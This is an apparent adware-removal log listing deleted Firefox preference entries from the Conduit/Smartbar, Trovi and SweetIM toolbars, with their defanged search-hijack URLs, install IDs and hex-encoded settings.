[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.toolbarLoginClientTime", "Fri Apr 10 2015 08:42:26 GMT-0500 (Central Daylight Time)");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.versionFromInstaller", "10.22.5.10");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762.xpeMode", "0");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("CT3309762_Firefox.csv", "[{\"from\":\"Abs Layer\",\"action\":\"loading toolbar\",\"time\":1441314419726,\"isWithState\":\"\",\"timeFromStart\":0,\"timeFromPrev\":0}]");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.ConduitHomepagesList", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.ConduitSearchEngineList", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.ConduitSearchUrlList", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "hxxp://feed.snap.do/?publisher=QuickObrw&dpid=QuickObrw&co=US&userid=9b727026-70c1-4247-99a0-7c2d64d1b1c7&searchtype=ds&installDate=05/10/2013&q=");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.TBHomepagesList", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.TBSearchEngineList", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.TBSearchUrlList", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("Smartbar.keywordURLSelectedCTID", "CT3309762");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("browser.search.defaultthis.engineName", "Protected Customized Web Search");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.asktb.ff-original-keyword-url", "hxxp://trovi.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.DockingPositionDown", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.SmartbarDisabled", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.SmartbarStateMinimaized", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.Visibility", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.countryiso", "us");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.downloadprovider", "quickobrw");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.installationid", "9b727026-70c1-4247-99a0-7c2d64d1b1c7");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.installdate", "22/05/2013");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extensions.helperbar.publisher", "quickobrw");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("[email protected]", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extentions.webcake.defaultEnableAppsList", "layers,brain/features,newOffers/wc");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("extentions.webcake.installId", "32bf225e-c506-4f3f-a9bb-a5ef35fa7900");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("plugin.state.npconduitfirefoxplugin", 2);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.addressBarOwnerCTID", "CT3309762");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.conduitHomepageList", "hxxp://search.conduit.com/?ctid=CT3309762&CUI=UN66126008119710230&UM=2&SearchSource=13");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.conduitSearchAddressUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=,hxxp://trovi.com/ResultsExt.aspx?ctid=CT33097[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.defaultSearchOwnerCTID", "CT3309762");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.homePageOwnerCTID", "CT3309762");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.homepageList", "hxxp://search.conduit.com/?ctid=CT3309762&CUI=UN66126008119710230&UM=2&SearchSource=13");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.machineId", "YZ/MQM/HOV0+D7FHQQ/8IBXNDMXDSQF0EQQEBR7NUCEJBTE5NA9IE9OZAYEO59GO1ZEZJ10GNOYVCO/S2NLONW");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("smartbar.searchAddressUrlList", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3309762&SearchSource=2&CUI=UN66126008119710230&UM=2&q=,hxxp://trovi.com/ResultsExt.aspx?ctid=CT3309762&Sear[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.dialogs.0.url", "hxxp://www.sweetim.com/simffbar/options_remote_ff.asp?lang=$locale_id;&toolbar_version=$ITEM_VERSION;&crg=$cargo;");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.dialogs.2.url", "hxxp://www.sweetim.com/simffbar/simcdadialog.asp");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.dnscatch.domain-blacklist", ".*.sweetim.com/.*.*.facebook.com/.*.*.google.com/.*.*.google.co.in/.*.*.google.com.br/.*.*.google.es/.*.*.youtube.com/.*.*.yahoo.com/.*.[...]
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.rc.url", "hxxp://www.sweetim.com/simffbar/rc.html?toolbar_version=$ITEM_VERSION;&crg=$cargo;&flavour=$flavr;");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.scripts.0.url", "hxxp://sc.sweetim.com/apps/in/fb/infb.js");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.scripts.1.url", "hxxps://sc.sweetim.com/apps/in/fb/infb.js");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("sweetim.toolbar.scripts.2.domain-blacklist", ".*.google..*.*.bing..*.*.live..*.*.msn..*.*.yahoo..*.*.youtube.com.*.*ask.com.*.*.sweetim.com.*");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E+x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E,x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E-x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E.:2z527.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E.x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E/x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E06CG5EL8:", "6E6C6D71736F736F6F71");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E06CG5EL8:.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E06CG5EL;8I:K", "247E2D2F226A74727377797579757577242F4B49474F42357D5D5C3D");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E06CG5EL;8I:K.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E0x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E1x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E2x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E31;CJ7FK;KG#[email protected]+VKN.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E3x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E4x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E5x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E6x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E7x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E8x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E9x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E:x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E;x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E<x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E=x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E>x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7E?x305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected]", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7EAx305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7EBE3G=;D9N9=D", "372C2D326975762E3A3C7B3A39434A494841434B265146492965504656496571734D334B57");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7EBE3G=;D9N9=D.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7EBx305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7ECx305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7EDx305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B+7Etx305.storedInFile", true);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B-0?3G>D", "663E6B3F727243767A427149492049784B4C254D2052502A54292757562B2859292F5B5E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B-0?3G>D.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected]:5;", "");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected]:5;.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B-0?3GFA7EF", "2B2E2C3D");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B-0?3GFA7EF.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B-3=3ECCJA=F>", "247E333D2C452F4135276F292A212C393D44307832332A354448584C3A232C2E2A31323334353A455F67566B5D67566F596B5F5F6A6567553E72786E687760");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B-3=3ECCJA=F>.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B/>01=9A6K6<IM;[email protected]", "6A696B7273747576");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B/>01=9A6K6<IM;[email protected]", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B3=>@44I48?", "372C2D3269757633423633414847203E3D474E4D4C45474F2A554A4D2D5858585E4B554E366352564F");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B3=>@44I48?.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B5BA==9CJAG", "6A6B6C3E427141707A437974787875767D4A4D2324");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B5BA==9CJAG.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B6B11G4C56B>F;P;[email protected]", "6E6C6D71736F6F76777171757A");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B6B11G4C56B>F;P;[email protected]", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected];7B=?OFB>>RHIQS", "393F352F3E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected];7B=?OFB>>RHIQS.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B9643G3/9E", "6A");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B9643G3/9E.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B;45>:BI9I7IE", "2B2E2C3D");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B;45>:BI9I7IE.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B<:222H64<", "393F352F3E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B<:222H64<.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B<:222H64<L8DAJ", "6D70706D7674717976782A797872797C757C7A");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B<:222H64<L8DAJ.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B=+03EH8H8J?:", "4443");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B=+03EH8H8J?:.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B?+E2A52D8", "372C2D326975762E3A3C7B3A39434A494841434B2651464929655046566470727951555E5E52");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B?+E2A52D8.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B?B0D:8AJ62<H", "6D");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./9B?B0D:8AJ62<H.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected]<0BI6A7GN:[email protected]?", "6C");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762./[email protected]<0BI6A7GN:[email protected]?.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.PG_ENABLE", "74727565");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.PG_ENABLE.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.SF_JUST_INSTALLED", "46414C5345");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.SF_JUST_INSTALLED.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.SF_STATUS", "454E41424C4544");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.SF_STATUS.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.SF_USER_ID", "6369645F31303432303135383432343138333033313738");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.SF_USER_ID.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.cb_user_id_000", "43423235343937343731343031375F313432383637333336323034345F46697265666F78");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.cb_user_id_000.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.cbfirsttime", "4672692041707220313020323031352030383A34323A343220474D542D30353030202843656E7472616C204461796C696768742054696D6529");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.cbfirsttime.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appStateReportTime", "31343431313032383031323632");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appStateReportTime.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_CouponBuddy", "6F6E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_CouponBuddy.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_Easytobook", "6F6E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_Easytobook.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_Easytobook_targeted", "6F6E");
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_Easytobook_targeted.storedInFile", false);
[-] [C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js] [Preference] Deleted : user_pref("valueApps.CT3309762.mam_gk_appState_Find-a-Pro", "6F6E");
